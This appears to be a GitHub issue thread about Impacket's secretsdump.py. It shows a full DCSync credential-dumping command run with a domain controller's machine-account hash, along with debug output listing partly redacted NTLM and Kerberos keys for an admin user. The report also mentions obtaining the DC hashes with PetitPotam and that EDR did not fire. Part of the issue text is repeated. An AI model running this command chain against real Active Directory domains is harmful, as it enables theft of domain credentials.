You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
$ KRB5CCNAME=wtf.txt secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Saving output to ntdsdump
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for adminuser1
[+] Calling DRSGetNCChanges for {50a0e1bd-9021-436c-accb-ffeaa0276702}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=adminuser1,OU=Admin Users,DC=example,DC=com
example.com\adminuser1:22773:aad3b435b51404eeaad3b435b51404ee:<redacted>:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
example.com\adminuser1:aes256-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:aes128-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:des-cbc-md5:<redacted>
[*] Cleaning up...
Additional context
Used petitpotam to get DC's NTLM hashes when went an tried to dump the domain. Trying to dump domain on this client failed, so tried -just-dc-user (rpc_access_denied). Tried just about everything including ticketer, and finally set the KRB5CCNAME and all of a sudden it just works using -just-dc-user.
Repeated the steps, I've set KRB5CCName to blank (export KRB5CCNAMe=) and set it to non-existent files, and blank files (wtf.txt above). For some reason, only with KRB5CCName is set will it dump this domain. I don't know the domain's exact setup so that could have something to do with it, but find it odd that KRB5CCName being set is the fix when using the NTLM hash.
The text was updated successfully, but these errors were encountered:
I've encountered this issue. EDR on the DC is not triggering nor is any other prevention. No crazy RPC hardening has occurred either. I was unable to even get the -just-dc-user flag to work with a specific user.
Configuration
impacket version: v0.11.0
Python version: 3.11.4
Target OS: Kali
This does not work...
This does?
Additional context
Used petitpotam to get DC's NTLM hashes when went an tried to dump the domain. Trying to dump domain on this client failed, so tried -just-dc-user (rpc_access_denied). Tried just about everything including ticketer, and finally set the KRB5CCNAME and all of a sudden it just works using -just-dc-user.
Repeated the steps, I've set KRB5CCName to blank (export KRB5CCNAMe=) and set it to non-existent files, and blank files (wtf.txt above). For some reason, only with KRB5CCName is set will it dump this domain. I don't know the domain's exact setup so that could have something to do with it, but find it odd that KRB5CCName being set is the fix when using the NTLM hash.
The text was updated successfully, but these errors were encountered: